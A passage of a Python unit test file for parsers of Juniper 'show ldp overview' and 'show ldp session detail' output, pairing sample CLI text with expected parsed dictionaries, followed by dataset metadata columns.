'ldp-deaggregate': 'disabled',
'ldp-explicit-null': 'disabled',
'ldp-gr-overview': {
'ldp-gr-helper': 'enabled',
'ldp-gr-max-neighbor-reconnect-time': 120000,
'ldp-gr-max-neighbor-recovery-time': 240000,
'ldp-gr-reconnect-time': 60000,
'ldp-gr-recovery-time': 160000,
'ldp-gr-restart': 'disabled',
'ldp-gr-restarting': 'false'
},
'ldp-igp-overview': {
'ldp-igp-sync-session-up-delay': 10,
'ldp-tracking-igp-metric': 'disabled'
},
'ldp-inet': 'enabled',
'ldp-instance-capability': {
'ldp-capability': 'none'
},
'ldp-instance-egress-fec-capability': {
'ldp-egress-fec-capability': 'entropy-label-capability'
},
'ldp-instance-name': 'master',
'ldp-interface-address': {
'interface-address': '10.1.2.2'
},
'ldp-ipv6-tunneling': 'disabled',
'ldp-job-overview': {
'ldp-inbound-read-job-loop-quantum': 100,
'ldp-inbound-read-job-time-quantum': 1000,
'ldp-outbound-read-job-loop-quantum': 100,
'ldp-outbound-read-job-time-quantum': 1000,
'ldp-read-job-loop-quantum': 100,
'ldp-read-job-time-quantum': 1000,
'ldp-write-job-loop-quantum': 100,
'ldp-write-job-time-quantum': 1000
},
'ldp-label-allocation': {
'ldp-global-label-current-allocs': 0,
'ldp-label-alloc-failure': 0,
'ldp-label-current-allocs': 1,
'ldp-label-total-allocs': 1,
'ldp-label-total-frees': 0
},
'ldp-loopback-if-added': 'no',
'ldp-message-id': 4,
'ldp-mtu-discovery': 'disabled',
'ldp-p2mp': {
'ldp-p2mp-no-rsvp-tunneling-enabled': 'disabled',
'ldp-p2mp-recursive-route-enabled': 'disabled'
},
'ldp-p2mp-transit-lsp-chaining': 'disabled',
'ldp-reference-count': 2,
'ldp-route-acknowledgement': 'enabled',
'ldp-route-preference': 9,
'ldp-router-id': '10.204.14.100',
'ldp-session-count': {
'ldp-control-mode': 'ordered',
'ldp-retention-mode': 'liberal',
'ldp-session-operational': 1
},
'ldp-session-protect-overview': {
'ldp-session-protect': 'disabled',
'ldp-session-protect-timeout': 0
},
'ldp-sr-mapping-client': 'disabled',
'ldp-strict-targeted-hellos': 'disabled',
'ldp-te-overview': {
'ldp-te-bgp-igp': 'disabled',
'ldp-te-both-ribs': 'disabled',
'ldp-te-mpls-forwarding': 'disabled'
},
'ldp-timer-overview': {
'ldp-instance-keepalive-interval': 10,
'ldp-instance-keepalive-timeout': 30,
'ldp-instance-label-withdraw-delay': 60,
'ldp-instance-link-hello-hold-time': 15,
'ldp-instance-link-hello-interval': 5,
'ldp-instance-link-protection-timeout': 120,
'ldp-instance-make-before-break-switchover-delay': 3,
'ldp-instance-make-before-break-timeout': 30,
'ldp-instance-targeted-hello-hold-time': 45,
'ldp-instance-targeted-hello-interval': 15
},
'ldp-transit-lsp-route-stats': 'disabled',
'ldp-transport-preference': 'IPv4',
'ldp-unicast-transit-lsp-chaining': 'disabled'
}
}
}
golden_output_2 = {'execute.return_value': '''
show ldp overview
Instance: master
Router ID: 10.204.14.100
Message id: 345
Configuration sequence: 1
Deaggregate: disabled
Explicit null: disabled
IPv6 tunneling: disabled
Strict targeted hellos: disabled
Loopback if added: no
Route preference: 9
Unicast transit LSP chaining: disabled
P2MP transit LSP chaining: disabled
Transit LSP statistics based on route statistics: disabled
Capabilities enabled: none
Protocol modes:
Distribution: unsolicited
Retention: liberal
Control: ordered
Sessions:
Operational: 1
Timers:
Keepalive interval: 10, Keepalive timeout: 30
Link hello interval: 5, Link hello hold time: 15
Targeted hello interval: 15, Targeted hello hold time: 45
Label withdraw delay: 60
Graceful restart:
Restart: enabled, Helper: enabled, Restart in process: false
Reconnect time: 60000, Max neighbor reconnect time: 120000
Recovery time: 160000, Max neighbor recovery time: 240000
Traffic Engineering:
Bgp igp: disabled
Both ribs: disabled
Mpls forwarding: disabled
IGP:
Tracking igp metric: disabled
Sync session up delay: 10
Session protection:
Session protection: disabled
Session protecton timeout: 0
Interface addresses advertising:
10.1.2.2
'''}
golden_parsed_output_2 = {
'ldp-overview-information': {
'ldp-overview': {
'ldp-configuration-sequence': 1,
'ldp-deaggregate': 'disabled',
'ldp-explicit-null': 'disabled',
'ldp-gr-overview': {
'ldp-gr-helper': 'enabled',
'ldp-gr-max-neighbor-reconnect-time': 120000,
'ldp-gr-max-neighbor-recovery-time': 240000,
'ldp-gr-reconnect-time': 60000,
'ldp-gr-recovery-time': 160000,
'ldp-gr-restart': 'enabled',
'ldp-gr-restarting': 'false'
},
'ldp-igp-overview': {
'ldp-igp-sync-session-up-delay': 10,
'ldp-tracking-igp-metric': 'disabled'
},
'ldp-instance-capability': {
'ldp-capability': 'none'
},
'ldp-instance-name': 'master',
'ldp-interface-address': {
'interface-address': '10.1.2.2'
},
'ldp-ipv6-tunneling': 'disabled',
'ldp-loopback-if-added': 'no',
'ldp-message-id': 345,
'ldp-p2mp-transit-lsp-chaining': 'disabled',
'ldp-protocol-modes': {
'ldp-control-mode': 'ordered',
'ldp-distribution-mode': 'unsolicited',
'ldp-retention-mode': 'liberal'
},
'ldp-route-preference': 9,
'ldp-router-id': '10.204.14.100',
'ldp-session-count': {
'ldp-session-operational': 1
},
'ldp-session-protect-overview': {
'ldp-session-protect': 'disabled',
'ldp-session-protect-timeout': 0
},
'ldp-strict-targeted-hellos': 'disabled',
'ldp-te-overview': {
'ldp-te-bgp-igp': 'disabled',
'ldp-te-both-ribs': 'disabled',
'ldp-te-mpls-forwarding': 'disabled'
},
'ldp-timer-overview': {
'ldp-instance-keepalive-interval': 10,
'ldp-instance-keepalive-timeout': 30,
'ldp-instance-label-withdraw-delay': 60,
'ldp-instance-link-hello-hold-time': 15,
'ldp-instance-link-hello-interval': 5,
'ldp-instance-targeted-hello-hold-time': 45,
'ldp-instance-targeted-hello-interval': 15
},
'ldp-transit-lsp-route-stats': 'disabled',
'ldp-unicast-transit-lsp-chaining': 'disabled'
}
}
}
golden_output_3 = {'execute.return_value': '''
show ldp overview
Instance: master
Reference count: 2
Router ID: 10.204.14.100
LDP inet: enabled
Transport preference: IPv4
Message id: 4
Configuration sequence: 1
Deaggregate: disabled
Explicit null: disabled
IPv6 tunneling: disabled
Strict targeted hellos: disabled
Loopback if added: no
Route preference: 9
Unicast transit LSP chaining: disabled
P2MP transit LSP chaining: disabled
Transit LSP statistics based on route statistics: disabled
LDP route acknowledgement: enabled
BGP export: enabled
LDP mtu discovery: disabled
LDP SR Mapping Client: disabled
Capabilities enabled: none
Egress FEC capabilities enabled: entropy-label-capability
Downstream unsolicited Sessions:
Operational: 1
Retention: liberal
Control: ordered
Auto targeted sessions:
Auto targeted: disabled
Dynamic tunnel session count: 0
P2MP:
Recursive route: disabled
No rsvp tunneling: disabled
Timers:
Keepalive interval: 10, Keepalive timeout: 30
Link hello interval: 5, Link hello hold time: 15
Targeted hello interval: 15, Targeted hello hold time: 45
Label withdraw delay: 60, Make before break timeout: 30
Make before break switchover delay: 3
Link protection timeout: 120
Graceful restart:
Restart: disabled, Helper: enabled, Restart in process: false
Reconnect time: 60000, Max neighbor reconnect time: 120000
Recovery time: 160000, Max neighbor recovery time: 240000
Traffic Engineering:
Bgp igp: disabled
Both ribs: disabled
Mpls forwarding: disabled
IGP:
Tracking igp metric: disabled
Sync session up delay: 10
Session protection:
Session protection: disabled
Session protection timeout: 0
Interface addresses advertising:
10.1.2.2
LDP Job:
Read job time quantum: 1000, Write job time quantum: 1000
Read job loop quantum: 100, Write job loop quantum: 100
Backup inbound read job time quantum: 1000, Backup outbound read job time quantum: 1000
Backup inbound read job loop quantum: 100, Backup outbound read job loop quantum: 100
Label allocation:
Current number of LDP labels allocated: 1
Total number of LDP labels allocated: 1
Total number of LDP labels freed: 0
Total number of LDP label allocation failure: 0
Current number of labels allocated by all protocols: 0
'''}
golden_parsed_output_3 = {
'ldp-overview-information': {
'ldp-overview': {
'ldp-auto-targeted-session': {
'ldp-auto-targeted-dyn-tun-ses-count': 0,
'ldp-auto-targeted-session-enabled': 'disabled'
},
'ldp-bgp-export': 'enabled',
'ldp-configuration-sequence': 1,
'ldp-deaggregate': 'disabled',
'ldp-explicit-null': 'disabled',
'ldp-gr-overview': {
'ldp-gr-helper': 'enabled',
'ldp-gr-max-neighbor-reconnect-time': 120000,
'ldp-gr-max-neighbor-recovery-time': 240000,
'ldp-gr-reconnect-time': 60000,
'ldp-gr-recovery-time': 160000,
'ldp-gr-restart': 'disabled',
'ldp-gr-restarting': 'false'
},
'ldp-igp-overview': {
'ldp-igp-sync-session-up-delay': 10,
'ldp-tracking-igp-metric': 'disabled'
},
'ldp-inet': 'enabled',
'ldp-instance-capability': {
'ldp-capability': 'none'
},
'ldp-instance-egress-fec-capability': {
'ldp-egress-fec-capability': 'entropy-label-capability'
},
'ldp-instance-name': 'master',
'ldp-interface-address': {
'interface-address': '10.1.2.2'
},
'ldp-ipv6-tunneling': 'disabled',
'ldp-job-overview': {
'ldp-inbound-read-job-loop-quantum': 100,
'ldp-inbound-read-job-time-quantum': 1000,
'ldp-outbound-read-job-loop-quantum': 100,
'ldp-outbound-read-job-time-quantum': 1000,
'ldp-read-job-loop-quantum': 100,
'ldp-read-job-time-quantum': 1000,
'ldp-write-job-loop-quantum': 100,
'ldp-write-job-time-quantum': 1000
},
'ldp-label-allocation': {
'ldp-global-label-current-allocs': 0,
'ldp-label-alloc-failure': 0,
'ldp-label-current-allocs': 1,
'ldp-label-total-allocs': 1,
'ldp-label-total-frees': 0
},
'ldp-loopback-if-added': 'no',
'ldp-message-id': 4,
'ldp-mtu-discovery': 'disabled',
'ldp-p2mp': {
'ldp-p2mp-no-rsvp-tunneling-enabled': 'disabled',
'ldp-p2mp-recursive-route-enabled': 'disabled'
},
'ldp-p2mp-transit-lsp-chaining': 'disabled',
'ldp-reference-count': 2,
'ldp-route-acknowledgement': 'enabled',
'ldp-route-preference': 9,
'ldp-router-id': '10.204.14.100',
'ldp-session-count': {
'ldp-control-mode': 'ordered',
'ldp-retention-mode': 'liberal',
'ldp-session-operational': 1
},
'ldp-session-protect-overview': {
'ldp-session-protect': 'disabled',
'ldp-session-protect-timeout': 0
},
'ldp-sr-mapping-client': 'disabled',
'ldp-strict-targeted-hellos': 'disabled',
'ldp-te-overview': {
'ldp-te-bgp-igp': 'disabled',
'ldp-te-both-ribs': 'disabled',
'ldp-te-mpls-forwarding': 'disabled'
},
'ldp-timer-overview': {
'ldp-instance-keepalive-interval': 10,
'ldp-instance-keepalive-timeout': 30,
'ldp-instance-label-withdraw-delay': 60,
'ldp-instance-link-hello-hold-time': 15,
'ldp-instance-link-hello-interval': 5,
'ldp-instance-link-protection-timeout': 120,
'ldp-instance-make-before-break-switchover-delay': 3,
'ldp-instance-make-before-break-timeout': 30,
'ldp-instance-targeted-hello-hold-time': 45,
'ldp-instance-targeted-hello-interval': 15
},
'ldp-transit-lsp-route-stats': 'disabled',
'ldp-transport-preference': 'IPv4',
'ldp-unicast-transit-lsp-chaining': 'disabled'
}
}
}
golden_output_4 = {'execute.return_value': '''
show ldp overview
Instance: master
Reference count: 2
Router ID: 10.204.14.100
LDP inet: enabled
Transport preference: IPv4
Message id: 4
Configuration sequence: 1
Deaggregate: disabled
Explicit null: disabled
IPv6 tunneling: disabled
Strict targeted hellos: disabled
Loopback if added: no
Route preference: 9
Unicast transit LSP chaining: disabled
P2MP transit LSP chaining: disabled
Transit LSP statistics based on route statistics: disabled
LDP route acknowledgement: enabled
BGP export: enabled
LDP mtu discovery: disabled
LDP SR Mapping Client: disabled
Capabilities enabled: none
Egress FEC capabilities enabled: entropy-label-capability
Downstream unsolicited Sessions:
Nonexistent: 1
Retention: liberal
Control: ordered
Auto targeted sessions:
Auto targeted: disabled
Dynamic tunnel session count: 0
P2MP:
Recursive route: disabled
No rsvp tunneling: disabled
Timers:
Keepalive interval: 10, Keepalive timeout: 30
Link hello interval: 5, Link hello hold time: 15
Targeted hello interval: 15, Targeted hello hold time: 45
Label withdraw delay: 60, Make before break timeout: 30
Make before break switchover delay: 3
Link protection timeout: 120
Graceful restart:
Restart: disabled, Helper: enabled, Restart in process: false
Reconnect time: 60000, Max neighbor reconnect time: 120000
Recovery time: 160000, Max neighbor recovery time: 240000
Traffic Engineering:
Bgp igp: disabled
Both ribs: disabled
Mpls forwarding: disabled
IGP:
Tracking igp metric: disabled
Sync session up delay: 10
Session protection:
Session protection: disabled
Session protection timeout: 0
Interface addresses advertising:
10.1.2.2
LDP Job:
Read job time quantum: 1000, Write job time quantum: 1000
Read job loop quantum: 100, Write job loop quantum: 100
Backup inbound read job time quantum: 1000, Backup outbound read job time quantum: 1000
Backup inbound read job loop quantum: 100, Backup outbound read job loop quantum: 100
Label allocation:
Current number of LDP labels allocated: 0
Total number of LDP labels allocated: 0
Total number of LDP labels freed: 0
Total number of LDP label allocation failure: 0
Current number of labels allocated by all protocols: 0
'''}
golden_parsed_output_4 = {
'ldp-overview-information': {
'ldp-overview': {
'ldp-auto-targeted-session': {
'ldp-auto-targeted-dyn-tun-ses-count': 0,
'ldp-auto-targeted-session-enabled': 'disabled'
},
'ldp-bgp-export': 'enabled',
'ldp-configuration-sequence': 1,
'ldp-deaggregate': 'disabled',
'ldp-explicit-null': 'disabled',
'ldp-gr-overview': {
'ldp-gr-helper': 'enabled',
'ldp-gr-max-neighbor-reconnect-time': 120000,
'ldp-gr-max-neighbor-recovery-time': 240000,
'ldp-gr-reconnect-time': 60000,
'ldp-gr-recovery-time': 160000,
'ldp-gr-restart': 'disabled',
'ldp-gr-restarting': 'false'
},
'ldp-igp-overview': {
'ldp-igp-sync-session-up-delay': 10,
'ldp-tracking-igp-metric': 'disabled'
},
'ldp-inet': 'enabled',
'ldp-instance-capability': {
'ldp-capability': 'none'
},
'ldp-instance-egress-fec-capability': {
'ldp-egress-fec-capability': 'entropy-label-capability'
},
'ldp-instance-name': 'master',
'ldp-interface-address': {
'interface-address': '10.1.2.2'
},
'ldp-ipv6-tunneling': 'disabled',
'ldp-job-overview': {
'ldp-inbound-read-job-loop-quantum': 100,
'ldp-inbound-read-job-time-quantum': 1000,
'ldp-outbound-read-job-loop-quantum': 100,
'ldp-outbound-read-job-time-quantum': 1000,
'ldp-read-job-loop-quantum': 100,
'ldp-read-job-time-quantum': 1000,
'ldp-write-job-loop-quantum': 100,
'ldp-write-job-time-quantum': 1000
},
'ldp-label-allocation': {
'ldp-global-label-current-allocs': 0,
'ldp-label-alloc-failure': 0,
'ldp-label-current-allocs': 0,
'ldp-label-total-allocs': 0,
'ldp-label-total-frees': 0
},
'ldp-loopback-if-added': 'no',
'ldp-message-id': 4,
'ldp-mtu-discovery': 'disabled',
'ldp-p2mp': {
'ldp-p2mp-no-rsvp-tunneling-enabled': 'disabled',
'ldp-p2mp-recursive-route-enabled': 'disabled'
},
'ldp-p2mp-transit-lsp-chaining': 'disabled',
'ldp-reference-count': 2,
'ldp-route-acknowledgement': 'enabled',
'ldp-route-preference': 9,
'ldp-router-id': '10.204.14.100',
'ldp-session-count': {
'ldp-control-mode': 'ordered',
'ldp-retention-mode': 'liberal',
'ldp-session-nonexistent': 1
},
'ldp-session-protect-overview': {
'ldp-session-protect': 'disabled',
'ldp-session-protect-timeout': 0
},
'ldp-sr-mapping-client': 'disabled',
'ldp-strict-targeted-hellos': 'disabled',
'ldp-te-overview': {
'ldp-te-bgp-igp': 'disabled',
'ldp-te-both-ribs': 'disabled',
'ldp-te-mpls-forwarding': 'disabled'
},
'ldp-timer-overview': {
'ldp-instance-keepalive-interval': 10,
'ldp-instance-keepalive-timeout': 30,
'ldp-instance-label-withdraw-delay': 60,
'ldp-instance-link-hello-hold-time': 15,
'ldp-instance-link-hello-interval': 5,
'ldp-instance-link-protection-timeout': 120,
'ldp-instance-make-before-break-switchover-delay': 3,
'ldp-instance-make-before-break-timeout': 30,
'ldp-instance-targeted-hello-hold-time': 45,
'ldp-instance-targeted-hello-interval': 15
},
'ldp-transit-lsp-route-stats': 'disabled',
'ldp-transport-preference': 'IPv4',
'ldp-unicast-transit-lsp-chaining': 'disabled'
}
}
}
golden_output_5 = {'execute.return_value': '''
show ldp overview
Instance: master
Router ID: 10.204.1.100
Message id: 4
Configuration sequence: 1
Deaggregate: disabled
Explicit null: disabled
IPv6 tunneling: disabled
Strict targeted hellos: disabled
Loopback if added: no
Route preference: 9
Unicast transit LSP chaining: disabled
P2MP transit LSP chaining: disabled
Transit LSP statistics based on route statistics: disabled
Capabilities enabled: none
Protocol modes:
Distribution: unsolicited
Retention: liberal
Control: ordered
Sessions:
Connecting: 1
Timers:
Keepalive interval: 10, Keepalive timeout: 30
Link hello interval: 5, Link hello hold time: 15
Targeted hello interval: 15, Targeted hello hold time: 45
Label withdraw delay: 60
Graceful restart:
Restart: enabled, Helper: enabled, Restart in process: false
Reconnect time: 60000, Max neighbor reconnect time: 120000
Recovery time: 160000, Max neighbor recovery time: 240000
Traffic Engineering:
Bgp igp: disabled
Both ribs: disabled
Mpls forwarding: disabled
IGP:
Tracking igp metric: disabled
Sync session up delay: 10
Session protection:
Session protection: disabled
Session protecton timeout: 0
Interface addresses advertising:
10.1.2.2
'''}
golden_parsed_output_5 = {
'ldp-overview-information': {
'ldp-overview': {
'ldp-configuration-sequence': 1,
'ldp-deaggregate': 'disabled',
'ldp-explicit-null': 'disabled',
'ldp-gr-overview': {
'ldp-gr-helper': 'enabled',
'ldp-gr-max-neighbor-reconnect-time': 120000,
'ldp-gr-max-neighbor-recovery-time': 240000,
'ldp-gr-reconnect-time': 60000,
'ldp-gr-recovery-time': 160000,
'ldp-gr-restart': 'enabled',
'ldp-gr-restarting': 'false'
},
'ldp-igp-overview': {
'ldp-igp-sync-session-up-delay': 10,
'ldp-tracking-igp-metric': 'disabled'
},
'ldp-instance-capability': {
'ldp-capability': 'none'
},
'ldp-instance-name': 'master',
'ldp-interface-address': {
'interface-address': '10.1.2.2'
},
'ldp-ipv6-tunneling': 'disabled',
'ldp-loopback-if-added': 'no',
'ldp-message-id': 4,
'ldp-p2mp-transit-lsp-chaining': 'disabled',
'ldp-protocol-modes': {
'ldp-control-mode': 'ordered',
'ldp-distribution-mode': 'unsolicited',
'ldp-retention-mode': 'liberal'
},
'ldp-route-preference': 9,
'ldp-router-id': '10.204.1.100',
'ldp-session-count': {
'ldp-session-connecting': 1
},
'ldp-session-protect-overview': {
'ldp-session-protect': 'disabled',
'ldp-session-protect-timeout': 0
},
'ldp-strict-targeted-hellos': 'disabled',
'ldp-te-overview': {
'ldp-te-bgp-igp': 'disabled',
'ldp-te-both-ribs': 'disabled',
'ldp-te-mpls-forwarding': 'disabled'
},
'ldp-timer-overview': {
'ldp-instance-keepalive-interval': 10,
'ldp-instance-keepalive-timeout': 30,
'ldp-instance-label-withdraw-delay': 60,
'ldp-instance-link-hello-hold-time': 15,
'ldp-instance-link-hello-interval': 5,
'ldp-instance-targeted-hello-hold-time': 45,
'ldp-instance-targeted-hello-interval': 15
},
'ldp-transit-lsp-route-stats': 'disabled',
'ldp-unicast-transit-lsp-chaining': 'disabled'
}
}
}
golden_parsed_output_6 = {
"ldp-overview-information": {
"ldp-overview": {
"ldp-auto-targeted-session": {
"ldp-auto-targeted-dyn-tun-ses-count": 0,
"ldp-auto-targeted-session-enabled": "disabled"
},
"ldp-bgp-export": "enabled",
"ldp-configuration-sequence": 2,
"ldp-control-mode": "ordered",
"ldp-deaggregate": "disabled",
"ldp-explicit-null": "disabled",
"ldp-gr-overview": {
"ldp-gr-helper": "enabled",
"ldp-gr-max-neighbor-reconnect-time": 120000,
"ldp-gr-max-neighbor-recovery-time": 240000,
"ldp-gr-reconnect-time": 60000,
"ldp-gr-recovery-time": 160000,
"ldp-gr-restart": "enabled",
"ldp-gr-restarting": "false"
},
"ldp-igp-overview": {
"ldp-igp-sync-session-up-delay": 10,
"ldp-tracking-igp-metric": "disabled"
},
"ldp-inet": "enabled",
"ldp-instance-capability": {
"ldp-capability": "none"
},
"ldp-instance-egress-fec-capability": {
"ldp-egress-fec-capability": "entropy-label-capability"
},
"ldp-instance-name": "master",
"ldp-interface-address": {
"interface-address": "10.169.14.157"
},
"ldp-ipv6-tunneling": "disabled",
"ldp-job-overview": {
"ldp-inbound-read-job-loop-quantum": 100,
"ldp-inbound-read-job-time-quantum": 1000,
"ldp-outbound-read-job-loop-quantum": 100,
"ldp-outbound-read-job-time-quantum": 1000,
"ldp-read-job-loop-quantum": 100,
"ldp-read-job-time-quantum": 1000,
"ldp-write-job-loop-quantum": 100,
"ldp-write-job-time-quantum": 1000
},
"ldp-label-allocation": {
"ldp-global-label-current-allocs": 0,
"ldp-label-alloc-failure": 0,
"ldp-label-current-allocs": 3,
"ldp-label-total-allocs": 7,
"ldp-label-total-frees": 4
},
"ldp-loopback-if-added": "no",
"ldp-message-id": 10,
"ldp-mtu-discovery": "disabled",
"ldp-p2mp": {
"ldp-p2mp-no-rsvp-tunneling-enabled": "disabled",
"ldp-p2mp-recursive-route-enabled": "disabled"
},
"ldp-p2mp-transit-lsp-chaining": "disabled",
"ldp-reference-count": 3,
"ldp-retention-mode": "liberal",
"ldp-route-acknowledgement": "enabled",
"ldp-route-preference": 9,
"ldp-router-id": "10.169.14.240",
"ldp-session-count": {
"ldp-control-mode": "ordered",
"ldp-retention-mode": "liberal",
"ldp-session-nonexistent": 1
},
"ldp-session-operational": 1,
"ldp-session-protect-overview": {
"ldp-session-protect": "disabled",
"ldp-session-protect-timeout": 0
},
"ldp-sr-mapping-client": "disabled",
"ldp-strict-targeted-hellos": "disabled",
"ldp-te-overview": {
"ldp-te-bgp-igp": "disabled",
"ldp-te-both-ribs": "disabled",
"ldp-te-mpls-forwarding": "disabled"
},
"ldp-timer-overview": {
"ldp-instance-keepalive-interval": 10,
"ldp-instance-keepalive-timeout": 30,
"ldp-instance-label-withdraw-delay": 60,
"ldp-instance-link-hello-hold-time": 15,
"ldp-instance-link-hello-interval": 5,
"ldp-instance-link-protection-timeout": 120,
"ldp-instance-make-before-break-switchover-delay": 3,
"ldp-instance-make-before-break-timeout": 30,
"ldp-instance-targeted-hello-hold-time": 45,
"ldp-instance-targeted-hello-interval": 15
},
"ldp-transit-lsp-route-stats": "disabled",
"ldp-transport-preference": "IPv4",
"ldp-unicast-transit-lsp-chaining": "disabled"
}
}
}
golden_output_6 = {'execute.return_value': '''
show ldp overview
Instance: master
Reference count: 3
Router ID: 10.169.14.240
LDP inet: enabled
Transport preference: IPv4
Message id: 10
Configuration sequence: 2
Deaggregate: disabled
Explicit null: disabled
IPv6 tunneling: disabled
Strict targeted hellos: disabled
Loopback if added: no
Route preference: 9
Unicast transit LSP chaining: disabled
P2MP transit LSP chaining: disabled
Transit LSP statistics based on route statistics: disabled
LDP route acknowledgement: enabled
BGP export: enabled
LDP mtu discovery: disabled
LDP SR Mapping Client: disabled
Capabilities enabled: none
Egress FEC capabilities enabled: entropy-label-capability
Downstream unsolicited Sessions:
Nonexistent: 1
Retention: liberal
Control: ordered
Operational: 1
Retention: liberal
Control: ordered
Auto targeted sessions:
Auto targeted: disabled
Dynamic tunnel session count: 0
P2MP:
Recursive route: disabled
No rsvp tunneling: disabled
Timers:
Keepalive interval: 10, Keepalive timeout: 30
Link hello interval: 5, Link hello hold time: 15
Targeted hello interval: 15, Targeted hello hold time: 45
Label withdraw delay: 60, Make before break timeout: 30
Make before break switchover delay: 3
Link protection timeout: 120
Graceful restart:
Restart: enabled, Helper: enabled, Restart in process: false
Reconnect time: 60000, Max neighbor reconnect time: 120000
Recovery time: 160000, Max neighbor recovery time: 240000
Traffic Engineering:
Bgp igp: disabled
Both ribs: disabled
Mpls forwarding: disabled
IGP:
Tracking igp metric: disabled
Sync session up delay: 10
Session protection:
Session protection: disabled
Session protection timeout: 0
Interface addresses advertising:
10.169.14.121
10.169.14.157
LDP Job:
Read job time quantum: 1000, Write job time quantum: 1000
Read job loop quantum: 100, Write job loop quantum: 100
Backup inbound read job time quantum: 1000, Backup outbound read job time quantum: 1000
Backup inbound read job loop quantum: 100, Backup outbound read job loop quantum: 100
Label allocation:
Current number of LDP labels allocated: 3
Total number of LDP labels allocated: 7
Total number of LDP labels freed: 4
Total number of LDP label allocation failure: 0
Current number of labels allocated by all protocols: 0
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLDPOverview(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
def test_golden_2(self):
self.device = Mock(**self.golden_output_2)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_2)
def test_golden_3(self):
self.device = Mock(**self.golden_output_3)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_3)
def test_golden_4(self):
self.device = Mock(**self.golden_output_4)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_4)
def test_golden_5(self):
self.device = Mock(**self.golden_output_5)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_5)
def test_golden_6(self):
self.device = Mock(**self.golden_output_6)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_6)
# =================================
# Unit test for 'show ldp session {ipaddress} detail'
# =================================
class TestShowLDPSessionIpaddressDetail(unittest.TestCase):
'''unit test for "show ldp session {ipaddress} detail'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"ldp-session-information": {
"ldp-session": {
"ldp-connection-state": "Open",
"ldp-graceful-restart-local": "disabled",
"ldp-graceful-restart-remote": "disabled",
"ldp-holdtime": "30",
"ldp-keepalive-interval": "10",
"ldp-keepalive-time": "3",
"ldp-local-address": "10.34.2.250",
"ldp-local-helper-mode": "enabled",
"ldp-local-label-adv-mode": "Downstream unsolicited",
"ldp-local-maximum-reconnect": "120000",
"ldp-local-maximum-recovery": "240000",
"ldp-mtu-discovery": "disabled",
"ldp-neg-label-adv-mode": "Downstream unsolicited",
"ldp-neighbor-address": "10.169.14.240",
"ldp-neighbor-count": "1",
"ldp-neighbor-types": {
"ldp-neighbor-type": "discovered"
},
"ldp-remaining-time": "23",
"ldp-remote-address": "10.169.14.240",
"ldp-remote-helper-mode": "enabled",
"ldp-remote-label-adv-mode": "Downstream unsolicited",
"ldp-retry-interval": "1",
"ldp-session-address": {
"interface-address": "10.169.14.157"
},
"ldp-session-capabilities-advertised": {
"ldp-capability": "none"
},
"ldp-session-capabilities-received": {
"ldp-capability": "none"
},
"ldp-session-flags": {
"ldp-session-flag": "none"
},
"ldp-session-id": "10.34.2.250:0--10.169.14.240:0",
"ldp-session-max-pdu": "4096",
"ldp-session-nsr-state": "Not in sync",
"ldp-session-protection": {
"ldp-session-protection-state": "disabled"
},
"ldp-session-role": "Passive",
"ldp-session-state": "Operational",
"ldp-up-time": "00:00:47"
}
}
}
golden_output = {
'execute.return_value':
'''
show ldp session 10.169.14.240 detail
Address: 10.169.14.240, State: Operational, Connection: Open, Hold time: 23
Session ID: 10.34.2.250:0--10.169.14.240:0
Next keepalive in 3 seconds
Passive, Maximum PDU: 4096, Hold time: 30, Neighbor count: 1
Neighbor types: discovered
Keepalive interval: 10, Connect retry interval: 1
Local address: 10.34.2.250, Remote address: 10.169.14.240
Up for 00:00:47
Capabilities advertised: none
Capabilities received: none
Protection: disabled
Session flags: none
Local - Restart: disabled, Helper mode: enabled
Remote - Restart: disabled, Helper mode: enabled
Local maximum neighbor reconnect time: 120000 msec
Local maximum neighbor recovery time: 240000 msec
Local Label Advertisement mode: Downstream unsolicited
Remote Label Advertisement mode: Downstream unsolicited
Negotiated Label Advertisement mode: Downstream unsolicited
MTU discovery: disabled
Nonstop routing state: Not in sync
Next-hop addresses received:
10.169.14.157
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLdpSessionIpaddressDetail(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse(ipaddress='10.169.14.240')
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLdpSessionIpaddressDetail(device=self.device)
parsed_output = obj.parse(ipaddress='10.169.14.240')
self.assertEqual(parsed_output, self.golden_parsed_output)
if __name__ == '__main__':
unittest.main()
| 39.766325
| 99
| 0.510955
| 6,109
| 62,115
| 5.154526
| 0.046325
| 0.035282
| 0.004573
| 0.01048
| 0.942456
| 0.927244
| 0.909492
| 0.899743
| 0.891264
| 0.888342
| 0
| 0.054491
| 0.365677
| 62,115
| 1,561
| 100
| 39.7918
| 0.744702
| 0.030283
| 0
| 0.739591
| 0
| 0
| 0.535713
| 0.151096
| 0
| 0
| 0
| 0
| 0.020439
| 1
| 0.020439
| false
| 0.000757
| 0.003785
| 0
| 0.081756
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fe91ca39969e5c100442103b74bf0563e25b2e9
| 1,916
|
py
|
Python
|
terrascript/scaleway/r.py
|
hugovk/python-terrascript
|
08fe185904a70246822f5cfbdc9e64e9769ec494
|
[
"BSD-2-Clause"
] | 4
|
2022-02-07T21:08:14.000Z
|
2022-03-03T04:41:28.000Z
|
terrascript/scaleway/r.py
|
hugovk/python-terrascript
|
